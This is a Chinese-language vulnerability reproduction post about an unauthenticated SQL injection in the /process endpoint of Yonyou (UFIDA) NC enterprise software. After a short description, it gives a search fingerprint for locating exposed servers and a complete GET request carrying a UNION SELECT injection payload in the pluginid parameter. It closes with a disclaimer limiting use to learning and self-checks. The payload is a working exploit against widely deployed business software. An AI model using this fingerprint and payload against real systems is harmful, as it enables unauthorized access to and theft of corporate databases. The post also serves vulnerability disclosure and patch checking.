【漏洞复现】|用友NC /process接口SQL注入漏洞

漏洞描述

用友NC(UFIDA NC)是用友软件公司推出的一款企业级管理软件,主要用于帮助企业实现财务管理、供应链管理、生产管理、项目管理、人力资源管理等业务的集成管理。用友NC /process接口处存在SQL注入漏洞，未经身份认证的攻击者可通过该接口执行SQL语句获取敏感信息。

资产概要 

body="/Client/Uclient/UClient.exe"

漏洞复现 

GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(118)||CHR(98)||CHR(118)||CHR(113)||CHR(113)||CHR(107)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20 HTTP/1.1
Host: 

 免责声明

本文分享的漏洞POC及相关技术仅限学习和自查用途，请勿用于非法测试或其他不当行为。传播或利用本文及相关工具所导致的任何直接或间接后果，包括法律责任和不良影响，均由使用者自行承担，文章作者概不负责。如内容涉及侵权问题，请及时联系，作者将迅速处理并致以歉意。此外，工具来源于网络，安全性需用户自行验证。感谢您的理解与支持！